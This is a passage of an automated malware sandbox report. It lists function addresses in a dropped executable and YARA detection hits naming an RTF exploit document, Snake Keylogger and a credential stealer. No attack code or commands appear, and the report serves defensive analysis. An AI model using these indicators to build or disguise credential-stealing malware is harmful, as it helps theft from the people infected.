                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B20687_2_006B2068
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B9A687_2_006B9A68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B60687_2_006B6068
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B77617_2_006B7761
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B37607_2_006B3760
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BF0677_2_006BF067
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B60787_2_006B6078
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BF0787_2_006BF078
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BAD787_2_006BAD78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B09707_2_006B0970
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B77707_2_006B7770
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BC5707_2_006BC570
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B49707_2_006B4970
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B57487_2_006B5748
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B40417_2_006B4041
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B00407_2_006B0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B6E407_2_006B6E40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BF5407_2_006BF540
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BB2407_2_006BB240
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BDD477_2_006BDD47
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BDD587_2_006BDD58
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B9A587_2_006B9A58
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B40507_2_006B4050
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BB2507_2_006BB250
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BCA287_2_006BCA28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BE2207_2_006BE220
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B9F247_2_006B9F24
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B57397_2_006B5739
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B17387_2_006B1738
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BCA387_2_006BCA38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B87387_2_006B8738
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B2E307_2_006B2E30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B9F307_2_006B9F30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BF5307_2_006BF530
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B6E347_2_006B6E34
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B0E087_2_006B0E08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B7C087_2_006B7C08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BFA087_2_006BFA08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B4E087_2_006B4E08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BB70C7_2_006BB70C
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B25007_2_006B2500
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BCF007_2_006BCF00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B65007_2_006B6500
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B4E187_2_006B4E18
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BB7187_2_006BB718
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B65107_2_006B6510
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B8C107_2_006B8C10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BE2107_2_006BE210
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B3BE97_2_006B3BE9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B44E87_2_006B44E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BE6E87_2_006BE6E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B5BE07_2_006B5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BBBE07_2_006BBBE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA3E77_2_006BA3E7
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B3BF87_2_006B3BF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA3F87_2_006BA3F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B0DF87_2_006B0DF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B7BF87_2_006B7BF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B8BFF7_2_006B8BFF
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B90C97_2_006B90C9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B32C87_2_006B32C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD3C87_2_006BD3C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BBBCF7_2_006BBBCF
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B72CC7_2_006B72CC
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA8C07_2_006BA8C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B04D87_2_006B04D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B72D87_2_006B72D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B90D87_2_006B90D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B44D87_2_006B44D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B5BD17_2_006B5BD1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B1BD07_2_006B1BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BE6D77_2_006BE6D7
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BEBAB7_2_006BEBAB
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B69A87_2_006B69A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BC0A87_2_006BC0A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B52A17_2_006B52A1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B12A07_2_006B12A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B80A07_2_006B80A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B95A07_2_006B95A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD3B87_2_006BD3B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B52B07_2_006B52B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BEBB07_2_006BEBB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA8B07_2_006BA8B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BAD887_2_006BAD88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B49807_2_006B4980
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD8807_2_006BD880
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B29987_2_006B2998
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B69987_2_006B6998
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD8907_2_006BD890
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B12907_2_006B1290
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B80907_2_006B8090
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B95947_2_006B9594
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D1CF07_2_006D1CF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DA5E87_2_006DA5E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB2687_2_006DB268
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D3E687_2_006D3E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE4687_2_006DE468
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC8487_2_006DC848
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DFA487_2_006DFA48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D00407_2_006D0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAC287_2_006DAC28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D18287_2_006D1828
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DDE287_2_006DDE28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC2087_2_006DC208
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF4087_2_006DF408
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAC187_2_006DAC18
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D30107_2_006D3010
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D00127_2_006D0012
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DBEE87_2_006DBEE8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF0E87_2_006DF0E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D04F87_2_006D04F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD4C87_2_006DD4C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D34D87_2_006D34D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DEAA87_2_006DEAA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB8A87_2_006DB8A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DCE887_2_006DCE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D0E8B7_2_006D0E8B
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D26807_2_006D2680
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D0E987_2_006D0E98
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DCB687_2_006DCB68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D13607_2_006D1360
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D134F7_2_006D134F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAF487_2_006DAF48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D2B487_2_006D2B48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE1487_2_006DE148
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC5287_2_006DC528
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF7287_2_006DF728
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DDB087_2_006DDB08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DA9087_2_006DA908
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D05087_2_006D0508
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF7177_2_006DF717
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD7E87_2_006DD7E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DBBC87_2_006DBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DEDC87_2_006DEDC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D09C07_2_006D09C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D09D07_2_006D09D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD1A87_2_006DD1A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D39A07_2_006D39A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD1A07_2_006DD1A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D21B87_2_006D21B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE7887_2_006DE788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB5887_2_006DB588
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F00407_2_006F0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F53307_2_006F5330
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F3D697_2_006F3D69
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAA687_2_006FAA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC4687_2_006FC468
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB7607_2_006FB760
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F3D787_2_006F3D78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC4787_2_006FC478
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FE9787_2_006FE978
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F57787_2_006F5778
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDE787_2_006FDE78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB7707_2_006FB770
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F30707_2_006F3070
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4A707_2_006F4A70
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7A487_2_006F7A48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F94487_2_006F9448
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF7407_2_006FF740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F6D407_2_006F6D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F87407_2_006F8740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F305F7_2_006F305F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAA597_2_006FAA59
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F94587_2_006F9458
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F87507_2_006F8750
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FCD287_2_006FCD28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F46287_2_006F4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F60287_2_006F6028
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F53267_2_006F5326
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC0207_2_006FC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F39207_2_006F3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7A3E7_2_006F7A3E
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F60387_2_006F6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDA307_2_006FDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F6D307_2_006F6D30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF7307_2_006FF730
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F9D087_2_006F9D08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB3087_2_006FB308
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F00067_2_006F0006
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F90007_2_006F9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F461A7_2_006F461A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB3187_2_006FB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FEE107_2_006FEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F39107_2_006F3910
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC0107_2_006FC010
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F68E87_2_006F68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F5BE07_2_006F5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FE4E07_2_006FE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F82F87_2_006F82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F75F07_2_006F75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8FF07_2_006F8FF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FBBC87_2_006FBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F34C87_2_006F34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4EC87_2_006F4EC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC8C17_2_006FC8C1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAEC07_2_006FAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F41C07_2_006F41C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F68DA7_2_006F68DA
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4ED87_2_006F4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FD5D87_2_006FD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FFBD87_2_006FFBD8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F5BD27_2_006F5BD2
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC8D07_2_006FC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F41D07_2_006F41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF2A87_2_006FF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8BA87_2_006F8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F98A17_2_006F98A1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7EA07_2_006F7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F34B97_2_006F34B9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FBBB87_2_006FBBB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F98B07_2_006F98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAEB07_2_006FAEB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F57887_2_006F5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDE887_2_006FDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F71887_2_006F7188
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FD1807_2_006FD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4A807_2_006F4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F64807_2_006F6480
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7E9E7_2_006F7E9E
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F71987_2_006F7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8B987_2_006F8B98
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F64907_2_006F6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762E787_2_00762E78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007635587_2_00763558
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007600407_2_00760040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00763C387_2_00763C38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007643187_2_00764318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007649F87_2_007649F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007650D87_2_007650D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007657B87_2_007657B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762E687_2_00762E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0076354A7_2_0076354A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007621307_2_00762130
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007621217_2_00762121
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00763C287_2_00763C28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762B007_2_00762B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007643087_2_00764308
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762AF27_2_00762AF2
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007649E97_2_007649E9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00760ED87_2_00760ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007650C87_2_007650C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007657A87_2_007657A8
                  Source: na.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
